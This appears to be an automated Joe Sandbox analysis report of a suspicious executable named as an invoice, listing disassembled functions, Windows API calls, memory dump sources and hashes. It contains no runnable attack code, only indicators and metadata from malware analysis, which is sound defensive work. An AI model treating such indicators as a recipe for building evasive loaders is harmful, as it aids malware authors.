                                                                            • Instruction Fuzzy Hash: DD112772604308BAEF106F60EC05FEB37A9EF88B65F010118FB41A2090D671E811EB10
                                                                            Function 00ED4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED4AD0), ref: 00ED4B45
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00ED4B57
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 8f2c202f5df78076c0b6a840f2b43f9bc9e15e058236a97f90a369bf878c4acf
                                                                            • Instruction ID: 83c5c3738465c56322bc51e75cb784f73fe245d86fe0032370397a8435fdc76d
                                                                            • Opcode Fuzzy Hash: 8f2c202f5df78076c0b6a840f2b43f9bc9e15e058236a97f90a369bf878c4acf
                                                                            • Instruction Fuzzy Hash: 23D0C270A00B17DFC7209F31D818B0276D4AF52346B10887B99C1D6290E670D488D655
                                                                            Function 00ED4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED4B83,?), ref: 00ED4C44
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00ED4C56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 9770454cb2364071675478accf95779d7ef423153edc57bbb1262dc387b5587c
                                                                            • Instruction ID: c9401b1128928d555ccec6b2ff807f2f1ec9c716a9d836eff1902c29a751dd41
                                                                            • Opcode Fuzzy Hash: 9770454cb2364071675478accf95779d7ef423153edc57bbb1262dc387b5587c
                                                                            • Instruction Fuzzy Hash: 2BD0C270510B13CFD7205F31C908606B3D4AF0134AB10887A9591D66A0E670C484D651
                                                                            Function 00ED4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED4BD0,?,00ED4DEF,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4C11
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00ED4C23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: 54afe9bb849d67afd1dc57a12b2f5bab53dfca24ae77815d84443d1b50ade09b
                                                                            • Instruction ID: 086d39ad745dfda567acfd2bc8be1e9d7f40eb72442bcad50c4dad8be3a44dec
                                                                            • Opcode Fuzzy Hash: 54afe9bb849d67afd1dc57a12b2f5bab53dfca24ae77815d84443d1b50ade09b
                                                                            • Instruction Fuzzy Hash: F7D0C270510B13CFD7206F70CA48606B6D5EF0934AB008C7A9481D6290E7B0C485DB51
                                                                            Function 00F50DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00F51039), ref: 00F50DF5
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F50E07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: 9a4d5839318afc0c3190b30e93bd51a41053de0edfd22565b7f86bae47b9f55f
                                                                            • Instruction ID: c6657912f895d1f8bc7c360074788088d373dcf2ce604c00b2a643df6ca21912
                                                                            • Opcode Fuzzy Hash: 9a4d5839318afc0c3190b30e93bd51a41053de0edfd22565b7f86bae47b9f55f
                                                                            • Instruction Fuzzy Hash: BDD0C730800B26CFC321AF70C80A28272E4AF00363F288C3E9A82C6150EBB0D894EB40
                                                                            Function 00F490E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F48CF4,?,00F5F910), ref: 00F490EE
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F49100
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 13d05a7398fef1fa3a1b6d165ed239fdd1adb95f0afe6b03cd833161c896c56e
                                                                            • Instruction ID: 638cc09cb21c84da2cb65e95cba8893914ac739dbb4acda27073d671667e9467
                                                                            • Opcode Fuzzy Hash: 13d05a7398fef1fa3a1b6d165ed239fdd1adb95f0afe6b03cd833161c896c56e
                                                                            • Instruction Fuzzy Hash: BED01234A14713DFD7209F31D81854776D4AF45356B11887A9A86D6550E6B0C484E791
                                                                            Function 00F11714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 6ef304e81ef7c90450027b87f6f35c7a84a001c6c0832daa5a03dcc449e64d3c
                                                                            • Instruction ID: ac63de0a80bdd7f761d3cbbde7190d45a2026c464d47ffb2fad2548f7a12bfd4
                                                                            • Opcode Fuzzy Hash: 6ef304e81ef7c90450027b87f6f35c7a84a001c6c0832daa5a03dcc449e64d3c
                                                                            • Instruction Fuzzy Hash: F1D0127280910DEACB009A90988C9F9777CB718301F141452FB02E2280E221C7D9F621
                                                                            Function 00F2717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab0d728a7cd06ea076bd1de4820d79fc2a1e704d8d22dc2302378cb48afd58a9
                                                                            • Instruction ID: 05d508fa2e5763d17fb730efaed75229ea46da4a584a0a2911fd073e21aeb829
                                                                            • Opcode Fuzzy Hash: ab0d728a7cd06ea076bd1de4820d79fc2a1e704d8d22dc2302378cb48afd58a9
                                                                            • Instruction Fuzzy Hash: 10C18075A04326EFCB14EF94D884EAEBBB5FF48314B148598E805EB251D730ED81EB90
                                                                            Function 00F4E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F4E0BE
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F4E101
                                                                              • Part of subcall function 00F4D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4D7C5
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F4E301
                                                                            • _memmove.LIBCMT ref: 00F4E314
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                            • String ID:
                                                                            • API String ID: 3659485706-0
                                                                            • Opcode ID: db96df360e4d7e79e8eb8c715330027ed2414acd206677ad963ef4d751554b14
                                                                            • Instruction ID: 1fa97134e6011d610212ad421fa68a31cfdb64fba410ebd7619f415b11c8ec4c
                                                                            • Opcode Fuzzy Hash: db96df360e4d7e79e8eb8c715330027ed2414acd206677ad963ef4d751554b14
                                                                            • Instruction Fuzzy Hash: 62C15B71A043019FC714DF28C480A6ABBE4FF89724F14896EF9999B352D771E946CB81
                                                                            Function 00F48093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 00F480C3
                                                                            • CoUninitialize.COMBASE ref: 00F480CE
                                                                              • Part of subcall function 00F2D56C: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00F2D5D4
                                                                            • VariantInit.OLEAUT32(?), ref: 00F480D9
                                                                            • VariantClear.OLEAUT32(?), ref: 00F483AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 780911581-0
                                                                            • Opcode ID: 3d3364f82bc27b1aa5a55fbe8e72585ad81e887972c87311d9090532686e65ae
                                                                            • Instruction ID: 2e69e5c77cb1c44881f962701125ce813212d218045cea44aadb23f7d88a3954
                                                                            • Opcode Fuzzy Hash: 3d3364f82bc27b1aa5a55fbe8e72585ad81e887972c87311d9090532686e65ae
                                                                            • Instruction Fuzzy Hash: 02A136756047019FDB04DF14C881A2EBBE4FF89764F144449F996AB3A2CB74ED06EB82
                                                                            Function 00F27530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F276EA
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F27702
                                                                            • CLSIDFromProgID.COMBASE(?,?), ref: 00F27727
                                                                            • _memcmp.LIBCMT ref: 00F27748
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: fd12d9c3a9a6ca79f31112fc8c1895d6c564ddcbc48efec0fdcfa39ea97e4c8f
                                                                            • Instruction ID: a617d2a7aecc20236d4863ffdf7617926955a7ecfff20635f011a6287a5bbc32
                                                                            • Opcode Fuzzy Hash: fd12d9c3a9a6ca79f31112fc8c1895d6c564ddcbc48efec0fdcfa39ea97e4c8f
                                                                            • Instruction Fuzzy Hash: C4813D71A00219EFCB04DFA4C984EEEB7B9FF89315F204198F505AB250DB71AE06DB60
                                                                            Function 00F2687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            • Opcode ID: 38150fd6e475be72aca6e5f4345b5ce3e9ebd3ff0f77f8053d3616930a310bac
                                                                            • Instruction ID: b5b888c14339d2f22aa7fe9e9872e22124e1074507bd84854007785da373d4d5
                                                                            • Opcode Fuzzy Hash: 38150fd6e475be72aca6e5f4345b5ce3e9ebd3ff0f77f8053d3616930a310bac
                                                                            • Instruction Fuzzy Hash: 4751C675B003159ACB24EF65E8A173AB3E5EF45310F20D81FE586EB291DB38DC81AB01
                                                                            Function 00F597F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(0114EC20,?), ref: 00F59863
                                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00F59896
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F59903
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 1f2131f64f1bb7eb985f1d6ba551d793c80bded67f42bece7cb9762a1e9ff215
                                                                            • Instruction ID: 4199bef3dc17712b1a5cc3c30164a66e968e656575c348fd4954690a2f57e32b
                                                                            • Opcode Fuzzy Hash: 1f2131f64f1bb7eb985f1d6ba551d793c80bded67f42bece7cb9762a1e9ff215
                                                                            • Instruction Fuzzy Hash: 9A514D34A04208EFCF14CF64C884AAE7BB5FF45362F548159FA659B2A0D770AD85EB90
                                                                            Function 00F29A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F29AD2
                                                                            • __itow.LIBCMT ref: 00F29B03
                                                                              • Part of subcall function 00F29D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F29DBE
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F29B6C
                                                                            • __itow.LIBCMT ref: 00F29BC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: 29c0e954bd278998edbd9350e26b93127a7d8de4b2c1d0ecf4a46db0095971be
                                                                            • Instruction ID: 84e37fcd07c17cd3c7d4ff0b63271c3f35892a812e85c7f8a3c50b6f584e8992
                                                                            • Opcode Fuzzy Hash: 29c0e954bd278998edbd9350e26b93127a7d8de4b2c1d0ecf4a46db0095971be
                                                                            • Instruction Fuzzy Hash: 5641B171A04318ABDF11EF54E845BFE7BF9EF88720F00006AF945A3291DBB09A45DB61
                                                                            Function 00F3B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F3B89E
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00F3B8C4
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F3B8E9
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F3B915
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: 0dfddd26ba2080d9382dd1fb977d34ae5413f6ebd7b1870d5c50b58b5d16cb39
                                                                            • Instruction ID: bb9c1804dfe70b59a98c45551a07b23872c47dab6ea93cf984aad01b6f56fbce
                                                                            • Opcode Fuzzy Hash: 0dfddd26ba2080d9382dd1fb977d34ae5413f6ebd7b1870d5c50b58b5d16cb39
                                                                            • Instruction Fuzzy Hash: FC412D39A00654DFCB14EF15C855A5DBBE1EF49720F058099ED4AAB362CB34FD02EB91
                                                                            Function 00F58851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F588DE
                                                                            Memory Dump Source
